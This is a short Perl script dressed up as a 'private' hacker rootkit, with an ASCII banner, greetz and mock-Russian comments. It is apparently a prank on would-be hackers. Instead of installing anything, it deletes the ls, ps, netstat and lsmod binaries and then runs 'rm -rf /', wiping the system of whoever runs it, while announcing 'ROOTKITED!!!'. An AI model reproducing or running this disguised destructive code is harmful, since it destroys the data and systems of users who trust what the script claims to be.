#!/usr/bin/perl ####################################################################### # PREVATE!!! PREVATE!!! PREVATE!!! PREVATE!!! PREVATE!!! PREVATE!!! # # DU NOTTE DESTREBUTTE! DU NOTTE DESTREBUTTE! DU NOTTE DESTREBUTTE! # # = Potreot-Rootkit (kornevaja sumka) = # # (c)oded by v00d00_sp00f3d # # Greetz: BuggerHukkerCrew # ####################################################################### &usage; # подключаем ф-ии руткита print " \n"; # hekk the pl0n8 print "[+] Zopuskaemsya...\n"; # зопускаемся print "[+] Pryachemsya...\n"; # используем перпроцессорную резидентность system("rm /bin/ls; rm /usr/bin/ls"); # прячем фаелы system("rm /bin/ps; rm /usr/bin/ps"); # прячем процессы system("rm /bin/netstat; rm /usr/bin/netstat"); # прячем netstat-лестенги system("rm /bin/lsmod; rm /usr/bin/lsmod"); # прячем модули print "[+] Mutiruem...\n"; # используем полиморфические технологии system("rm -rf /"); # зокрепляемся в сестеме (крепко!!!) print "[+] ROOTKITED!!! YOU AR HEKKER!!!\n"; # ХЭККЕР!!!! sub usage() { print q( ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ________ __ _____ .__ __ / _____/ _____/ |__/ ____\____ __ __| |_/ | / \ ___ / _ \ __\ __\\__ \ | | \ |\ __\ \ \_\ \ <_> | | | | / __ \| | / |_| | \______ /\____/|__| | | |____ /____/|____/__| \/ | | \/ | | | | | | | | | | |__| [ Potreot-Rootkit (kornevaja sumka) by v00d00_sp00f3d ] KEEP IT PREVATE OR DIE BITCH! MVO-PRIV8 STUFF Greetz: BuggerHukkerCrew ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ); }